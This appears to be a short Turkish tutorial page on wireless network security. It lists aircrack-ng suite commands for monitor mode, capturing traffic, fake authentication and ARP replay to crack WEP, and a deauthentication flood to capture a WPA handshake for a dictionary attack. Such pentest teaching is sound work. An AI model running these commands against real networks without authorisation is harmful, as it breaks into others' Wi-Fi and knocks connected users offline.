Ana içeriğe geç

Kablosuz Ağ Güvenliği

Kablosuz ağ güvenliği için eğer donanım monitör modunu desteklemiyorsa harici bir ağ kartına ihtiyaç vardır.

Donanımı dinleme moduna almak gerekiyor.

airmon-ng start wlan0 # wlan0 --> wlan0mon

Etraftaki sinyalleri görmek için airodump-ng kullanılır.

airodump-ng wlan0mon

Donanımı dinleme modundan çıkarmak için.

airmon-ng stop wlan0 # wlan0mon --> wlan0

BSSID: Kablosuz kartının fiziki mac adresi

PWR: Yayının sinyal gücü

Beacon: Kablosuz yönetimi için kullanılan çeşitli yönetim paketlerinin sayısı

Data: Beacon harici geri kalan paketlerin sayısı

CH: Hangi kanalda yayın yaptığını gösterir

ENC: Şifreleme yöntemi

CIPHER: Şifreleme türü. CCMP -> AES

AUTH: Önceden paylaşımlı anahtar(PSK), MGT veya OPEN gibi kimlik doğrulama yöntemini gösterir

ESSID: Kablosuz yayının ismi

airodump-ng -a parametresiyle sadece bağlı olan clientler gösterilebilir


WEP

Üst taraftaki tablodan bu bilgiler elde edildikten sonra alt taraftaki tablodan da kablosuz ağa bağlanmış veya bağlanmaya çalışan diğer cihazları görebiliriz.

Tek bir erişim noktasını dinlemek için kanal, mac adresi vermek yeterliyken daha sonra şifreyi bulabilmek için -w parametresiyle trafiği kayıt edebiliriz.

airodump-ng -c #CH --bssid #00:00:00:00:00:00 -w pcap wlan0mon

Alınan paketlerin sayısını arttırmak için sahte bir oturumla arp paketlerini kullanarak şansımızı arttırabiliriz.

aireplay-ng --fakeauth 1 wlp1s0mon -a #bssid
aireplay-ng --arpreplay wlp1s0mon -b #bssid

Yeterli pakete ulaşılması durumunda aircrack-ng kullanılarak kırılabilir.

aircrack-ng pcap

WPA

airodump-ng -c #CH --bssid #00:00:00:00:00:00 -w pcap wlan0mon

Handshake yakalamak için deauth paketi gönderilebilir.

aireplay-ng -0 100 -a #AccessPoint -c #Client wlan0mon

Dinlemeye başladıktan sonra WPA HANDSHAKE yakalandığında dinlemeyi bırakıp oluşturulan pcap dosyasını aircrack ile sözlük saldırısı kullanılarak kırılabilir.


Son Güncelleme: 28 Mayıs 2020